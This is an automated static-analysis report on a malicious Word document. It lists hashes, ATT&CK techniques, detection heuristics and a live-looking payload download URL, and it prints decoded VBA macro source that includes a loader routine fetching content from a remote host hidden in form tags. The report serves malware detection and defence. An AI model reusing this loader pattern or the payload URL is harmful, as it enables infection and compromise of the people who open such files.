Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 4d6cae7b162bbe02…

MALICIOUS

Office (OOXML)

744.1 KB Created: 2019-09-30 11:23:00 UTC Authoring application: Microsoft Office Word 14.0000 First seen: 2020-02-04
MD5: 1cab666691b1eebed7e5dafce5aea697 SHA-1: 9351542ab11b9770a4f7eb7cdec167d40476fe21 SHA-256: 4d6cae7b162bbe023af333c130819e6d1efb5506cf0ed5685294601ead5af226
372 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file contains a critical obfuscated auto-exec VBA loader with a Document_Open macro, indicating malicious intent. The VBA script attempts to download and execute a payload from the URL http://ikh63fd.imparisystems.com/UTRO.php. This is further supported by the embedded OLE object also containing a macro and pointing to the same URL.

Heuristics 10

  • ClamAV: Doc.Malware.Ehrf-10008131-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Ehrf-10008131-0
  • Embedded Office object carries macros critical OFFICE_EMBEDDED_MACRO_OBJECT
    This document embeds a second Office file that itself contains a VBA macro project or an Excel 4.0 (XLM) macro sheet. Hiding a macro-bearing workbook or document inside another document — frequently under an obfuscated, non-standard part name — is a macro-smuggling technique that defeats scanners which only inspect the outer document's macro storage. No benign authoring workflow stages a hidden macro project this way.
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
  • Embedded OLE object medium OOXML_OLE_OBJECT
    Document contains an embedded OLE object
  • Payload URL recovered from embedded OLE object (1 URL) info OOXML_EMBEDDED_OBJECT_URL
    An embedded OLE object (xl/word/ppt embeddings) carries a next-stage download URL in its Ole10Native/Package stream — stored literally (incl. UTF-16) or base64-encoded — which the package-level URL sweep does not see. Surfaced as an IOC; self-validating (only real payload hosts).
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://ikh63fd.imparisystems.com/UTRO.php In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
    • http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OOXML body / shared strings)

Extracted artifacts 3

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 9985 bytes
SHA-256: 753b04b799c1c13dc86848861086149289af1fc3bf8e24cfbcb0d0093214a624
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Public Sub vSDtPv()
If Year(Date) = 2019 Then
hZWemp.grhgrgrg
End If
ThisDocument.Close
End Sub





Attribute VB_Name = "hZWemp"
Attribute VB_Base = "0{4888A8D6-9478-4555-AA01-426265E8A53C}{53624690-F57E-4A2D-9737-B47097B0914C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Public kfAeXgL As String
Public hEorHPq As Object
Dim vlnmlgmrglpPP(309, 2) As String
Public Sub grhgrgrg()

On Error Resume Next

hZWemp.Hide

Set hEorHPq = CreateObject(fhvgut.Tag)

hEorHPq.navigate (hZWemp.yDsymL.Tag)

Do Until hEorHPq.readyState = 4

DoEvents

Loop

kfAeXgL = hEorHPq.Document.body.innerText

nxUVWWo

End Sub


'Replace accended chars with their plaintext alphabet counterparts


'Remove all shapes in the Active Document
Function DeleteShapes()
    Dim i As Long
    With ActiveDocument
    For i = .Shapes.Count To 1 Step -1
        With .Shapes(i)
            If .Type = msoAutoShape Then .Delete
        End With
    Next i
End With
End Function
'Save a new file from range Section within the parent file with fileName from Range Header within Section
Private Static Sub CopyAndSave(Section As Range, Header As Range, maxFileName As Integer)
    Dim name As String
    Header.Select
    Selection.ClearFormatting
    Dim D As Document
   
    'File name cannot contain \ / : * ? " < > |
    name = Replace(Header.Text, Chr(13), "")
    name = Application.CleanString(name)
    name = Replace(name, "\", "-")
    name = Replace(name, "/", "-")
    name = Replace(name, ":", "-")
    name = Replace(name, "?", "-")
    name = Replace(name, "*", "")
    name = Replace(name, """", "")
    name = Replace(name, "<", " ")
    name = Replace(name, ">", " ")
    name = Replace(name, "|", " ")
    name = Replace(name, "    ", "")
    name = Replace(name, Chr(10), "")
    name = Replace(name, Chr(13), "")
    name = Replace(name, Chr(9), "")
    name = Replace(name, "‘", "'")
    name = Replace(name, "’", "'")
    name = Replace(name, "“", "'")
    name = Replace(name, "”", "'")
    name = Replace(name, " ", "")
    name = Replace(name, "®", "(R)")
    name = Replace(name, "™", "(TM)")
    name = Replace(name, "™", "(TM)")
    name = Replace(name, "£", "(E)")
    name = Replace(name, " ", " ")
    name = Replace(name, "–", "-")
    name = Replace(name, "—", "-")
    name = Trim(name)
  
    'Debug.Print name
   
    'Reformatting Header
    Header.Select
    Selection.Font.Bold = True
    Selection.Font.Grow
    
    'Truncate File names to under maxFileName chars
    If (Len(name) > maxFileName) Then
        name = Left(name, maxFileName) & " ..."
    End If
    'Debug.Print "Saving: " & name
    
    Header.Copy
    Section.Copy
    
    'Saving Document
    Set D = Documents.Add
    D.Range.PasteAndFormat wdFormatOriginalFormatting
    With D.Content.Find
        .ClearFormatting
        .MatchWildcards = True
        .MatchCase = False
        .Text = "^13([1-9]).([1-9])*^13"
        .Replacement.ClearFormatting
        .Replacement.Text = ""
        .Execute Replace:=wdReplaceAll, Forward:=True, _
        Wrap:=wdFindContinue
    End With
    
    D.SaveAs2 FileName:=Section.Parent.Path & Application.PathSeparator & name & ".htm", _
    FileFormat:=wdFormatFilteredHTML
    D.Close
End Sub

'Remove all existing hyperlinks in a document.
Private Static Sub RemoveAllHyperlinks()
    Dim oField As Field
    For Each oField In ActiveDocument.Fields
        If oField.Type = wdFieldHyperlink Then
            oField.Unlink
        End If
    Next
    Set oField = Nothing
End Sub


P
... (truncated)
ooxml_oleobject_00.bin ooxml-ole-object OOXML embedded OLE part: word/embeddings/_________Microsoft_Word_97-20031.doc 223232 bytes
SHA-256: 323fe57f6aa5b000b3eaa76049b1296c7794ae727d7b3ec54b6367a5e724bc34
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 14336 bytes
SHA-256: b1a7b3c0481646deaf6941c713b8191df65ddb36080d2e144e5fe9a83a78c1d2
Detection
ClamAV: Doc.Malware.Ehrf-10008131-0
Obfuscation or payload: unlikely